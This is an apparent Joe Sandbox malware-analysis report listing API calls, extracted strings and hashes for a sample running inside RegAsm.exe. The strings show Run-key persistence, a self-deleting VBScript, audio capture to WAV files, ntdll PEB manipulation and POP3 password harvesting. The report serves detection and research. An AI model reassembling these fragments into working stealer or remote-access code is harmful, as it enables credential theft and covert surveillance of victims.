                          • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                          • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                          • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                          • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                          • String ID:
                          • API String ID: 1661935332-0
                          • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                          • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                          • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                          • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free$InfoLocale_abort
                          • String ID:
                          • API String ID: 1663032902-0
                          • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                          • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                          • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                          • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$InfoLocale_abort_free
                          • String ID:
                          • API String ID: 2692324296-0
                          • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                          • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                          • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                          • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                          APIs
                            • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                          • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalEnterEnumLocalesSectionSystem
                          • String ID:
                          • API String ID: 1272433827-0
                          • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                          • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                          • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                          • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                          • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                          • String ID:
                          • API String ID: 1084509184-0
                          • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                          • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                          • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                          • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                          APIs
                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.2 Pro), ref: 0040F920
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                          • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                          • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                          • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                          APIs
                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.|,004752F0,?,pth_unenc), ref: 0040B8F6
                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                          • ExitProcess.KERNEL32 ref: 0040D80B
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                          • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                          • API String ID: 1861856835-1447701601
                          • Opcode ID: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                          • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                          • Opcode Fuzzy Hash: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                          • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                          APIs
                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.|,004752F0,?,pth_unenc), ref: 0040B8F6
                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636A1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                          • ExitProcess.KERNEL32 ref: 0040D454
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                          • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`.|$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                          • API String ID: 3797177996-3206307217
                          • Opcode ID: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                          • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                          • Opcode Fuzzy Hash: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                          • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                          APIs
                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                          • ExitProcess.KERNEL32(00000000), ref: 004124DB
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                          • CloseHandle.KERNEL32(00000000), ref: 00412576
                          • GetCurrentProcessId.KERNEL32 ref: 0041257C
                          • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                          • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                          • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                          • Sleep.KERNEL32(000001F4), ref: 004126BD
                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                          • CloseHandle.KERNEL32(00000000), ref: 004126E4
                          • GetCurrentProcessId.KERNEL32 ref: 004126EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                          • String ID: .exe$8SG$WDH$exepath$open$temp_
                          • API String ID: 2649220323-436679193
                          • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                          • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                          • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                          • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                          APIs
                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                          • SetEvent.KERNEL32 ref: 0041B2AA
                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                          • CloseHandle.KERNEL32 ref: 0041B2CB
                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                          • API String ID: 738084811-2094122233
                          • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                          • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                          • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                          • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                          APIs
                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                          • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                          • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                          • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Write$Create
                          • String ID: RIFF$WAVE$data$fmt
                          • API String ID: 1602526932-4212202414
                          • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                          • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                          • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                          • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                          APIs
                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,`.|,00407709), ref: 004072BF
                          • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                          • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                          • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                          • GetProcAddress.KERNEL32(00000000), ref: 00407308
                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                          • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                          • GetProcAddress.KERNEL32(00000000), ref: 00407330
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                          • API String ID: 1646373207-255920310
                          • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                          • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                          • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                          • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$EnvironmentVariable
                          • String ID: X8|
                          • API String ID: 1464849758-3552716790
                          • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                          • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                          • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                          • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                          • API String ID: 4218353326-3023110444
                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                          • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                          • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                          APIs
                          • _wcslen.LIBCMT ref: 0040CE42
                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                          • CopyFileW.KERNEL32 ref: 0040CF0B
                          • _wcslen.LIBCMT ref: 0040CF21
                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                          • CopyFileW.KERNEL32 ref: 0040CFBF
                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                          • _wcslen.LIBCMT ref: 0040D001
                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                          • CloseHandle.KERNEL32 ref: 0040D068
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                          • ExitProcess.KERNEL32 ref: 0040D09D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                          • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$`.|$del$open
                          • API String ID: 1579085052-1843855153
                          • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                          • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                          • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                          • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                          APIs
                          • lstrlenW.KERNEL32(?), ref: 0041C0C7
                          • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                          • lstrlenW.KERNEL32(?), ref: 0041C0F8
                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
